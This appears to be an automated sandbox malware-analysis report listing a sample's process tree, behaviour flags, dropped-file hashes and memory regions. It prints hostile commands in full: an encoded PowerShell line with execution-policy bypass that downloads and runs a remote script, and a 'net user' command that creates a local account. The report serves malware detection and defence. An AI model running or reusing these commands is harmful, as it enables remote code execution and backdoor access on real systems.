C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES3FDE.tmpMD5
0375914593b948a36e267f39b56c6f2e
SHA14e5bd2b6d550a21d5b4b770617084492b4d185c2
SHA256b07d87250b79e8ece6d2bad60c129cffa6c79eadb2d4915976ab8f537894c059
SHA5124377d6369c67baa0bb05be84119f4c5f22888beea09ae669d2ca1c8b9c669ea7d8186d7c32922f75d74b8db8c81a7ef4bd8a544640ab0d169217d89f086b729c
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Users\Admin\AppData\Local\Temp\ntadosty\ntadosty.dllMD5
9ded83e7d5f2493ec643f6f1425cedd3
SHA10be6a701fb835d57f3897101f4ea8b5e8d118e30
SHA256acfd252779091b2d77f1e7ff7fc1a36469de39c0809c5b67760c5ae7d7764caa
SHA5120249d4b68bd7927a1ac931c5f0b16db24c54dd5548c2060902f29a3e7bbb59eee827719345c5652380cc63fd14528affa9a7d24bc02028eda88825b0fbfbc7a6
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\ntadosty\CSC918089AEFB9045FD8E57BB6F6838F66C.TMPMD5
f5f225410f58978aa0a4e2067c9f76cb
SHA1594fc4e4a8d70282e7891cef66325f9cc3e1ddeb
SHA2565e8d8993c5bafe50e31c464be0fb510d0b2f1befa5797ed791c5d069d8091054
SHA5126bf07c202cfcd3c8b038bbe6f2e489bb372c7a122075512f8ff62d5c1c8cf0b7741fb1235a514cba43ae1b37c75326d6e4350ca3e3591d73a710e8025d2fbe86
-
\??\c:\Users\Admin\AppData\Local\Temp\ntadosty\ntadosty.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\ntadosty\ntadosty.cmdlineMD5
00f91486673950c00e11f3ea78414b7b
SHA1e2846f616fade8ab175d5e0ed1572fe22e23afdd
SHA256bf81bc06cfc365cce95bfb1797c91d9afdc5319fa34e0cdb57c195b950151534
SHA512df2d87ae9697bf043741aedbda5ab439e695567ca3f6b1149f503161e190c6cd424954cae5781f15ad45bd2d2c86ed9db7d4a9ac31c563d005b4178725bafa96
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.pngMD5
d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/268-48-0x0000000000000000-mapping.dmp
-
memory/408-73-0x0000000000000000-mapping.dmp
-
memory/408-10-0x0000000000000000-mapping.dmp
-
memory/528-69-0x0000000000000000-mapping.dmp
-
memory/544-55-0x0000000000000000-mapping.dmp
-
memory/576-13-0x0000000000000000-mapping.dmp
-
memory/628-78-0x0000000000000000-mapping.dmp
-
memory/916-52-0x0000000000000000-mapping.dmp
-
memory/920-53-0x0000000000000000-mapping.dmp
-
memory/956-51-0x0000000000000000-mapping.dmp
-
memory/1016-86-0x0000000000000000-mapping.dmp
-
memory/1016-45-0x0000000000000000-mapping.dmp
-
memory/1072-39-0x0000000000000000-mapping.dmp
-
memory/1084-42-0x0000000000000000-mapping.dmp
-
memory/1088-117-0x0000000000000000-mapping.dmp
-
memory/1404-80-0x0000000000000000-mapping.dmp
-
memory/1404-91-0x0000000000FF0000-0x0000000000FF1000-memory.dmpFilesize
4KB
-
memory/1404-96-0x0000000001030000-0x0000000001031000-memory.dmpFilesize
4KB
-
memory/1404-99-0x00000000010D0000-0x00000000010D1000-memory.dmpFilesize
4KB
-
memory/1404-107-0x0000000019550000-0x0000000019551000-memory.dmpFilesize
4KB
-
memory/1404-116-0x000000001AEB0000-0x000000001AEB1000-memory.dmpFilesize
4KB
-
memory/1404-108-0x000000001AAE0000-0x000000001AAE1000-memory.dmpFilesize
4KB
-
memory/1404-100-0x0000000019550000-0x0000000019551000-memory.dmpFilesize
4KB
-
memory/1404-115-0x000000001A050000-0x000000001A051000-memory.dmpFilesize
4KB
-
memory/1404-98-0x0000000001270000-0x0000000001271000-memory.dmpFilesize
4KB
-
memory/1404-97-0x00000000010C0000-0x00000000010C1000-memory.dmpFilesize
4KB
-
memory/1404-81-0x000007FEF5790000-0x000007FEF617C000-memory.dmpFilesize
9.9MB
-
memory/1416-67-0x0000000000000000-mapping.dmp
-
memory/1448-74-0x0000000000000000-mapping.dmp
-
memory/1516-77-0x0000000000000000-mapping.dmp
-
memory/1516-66-0x0000000000000000-mapping.dmp
-
memory/1520-70-0x0000000000000000-mapping.dmp
-
memory/1604-71-0x0000000000000000-mapping.dmp
-
memory/1628-56-0x0000000000000000-mapping.dmp
-
memory/1632-49-0x0000000000000000-mapping.dmp
-
memory/1648-54-0x0000000000000000-mapping.dmp
-
memory/1680-87-0x0000000000000000-mapping.dmp
-
memory/1684-50-0x0000000000000000-mapping.dmp
-
memory/1716-40-0x0000000000000000-mapping.dmp
-
memory/1840-9-0x000000001B5A0000-0x000000001B5A1000-memory.dmpFilesize
4KB
-
memory/1840-4-0x0000000002270000-0x0000000002271000-memory.dmpFilesize
4KB
-
memory/1840-5-0x000000001AAB0000-0x000000001AAB1000-memory.dmpFilesize
4KB
-
memory/1840-6-0x0000000002450000-0x0000000002451000-memory.dmpFilesize
4KB
-
memory/1840-33-0x0000000002530000-0x0000000002531000-memory.dmpFilesize
4KB
-
memory/1840-34-0x0000000002540000-0x0000000002541000-memory.dmpFilesize
4KB
-
memory/1840-17-0x000000001A890000-0x000000001A891000-memory.dmpFilesize
4KB
-
memory/1840-18-0x000000001C0D0000-0x000000001C0D1000-memory.dmpFilesize
4KB
-
memory/1840-2-0x0000000000000000-mapping.dmp
-
memory/1840-3-0x000007FEF5790000-0x000007FEF617C000-memory.dmpFilesize
9.9MB
-
memory/1840-35-0x000000001C140000-0x000000001C141000-memory.dmpFilesize
4KB
-
memory/1840-7-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/1840-38-0x0000000002500000-0x0000000002510000-memory.dmpFilesize
64KB
-
memory/1840-21-0x000000001C100000-0x000000001C101000-memory.dmpFilesize
4KB
-
memory/1848-47-0x0000000000000000-mapping.dmp
-
memory/1848-64-0x0000000000000000-mapping.dmp
-
memory/1892-41-0x0000000000000000-mapping.dmp
-
memory/1904-57-0x0000000000000000-mapping.dmp
-
memory/1912-36-0x0000000000000000-mapping.dmp
-
memory/1920-63-0x0000000000000000-mapping.dmp
-
memory/1920-46-0x0000000000000000-mapping.dmp
-
memory/1940-118-0x0000000000000000-mapping.dmp
-
memory/1964-58-0x0000000000000000-mapping.dmp
-
memory/2000-61-0x0000000000000000-mapping.dmp
-
memory/2008-62-0x0000000000000000-mapping.dmp
-
memory/2016-79-0x0000000000000000-mapping.dmp
-
memory/2016-44-0x0000000000000000-mapping.dmp
-
memory/2016-72-0x0000000000000000-mapping.dmp
-
memory/2028-0-0x0000000002120000-0x000000000245D000-memory.dmpFilesize
3.2MB
-
memory/2028-43-0x0000000000000000-mapping.dmp
-
memory/2028-1-0x0000000002460000-0x0000000002471000-memory.dmpFilesize
68KB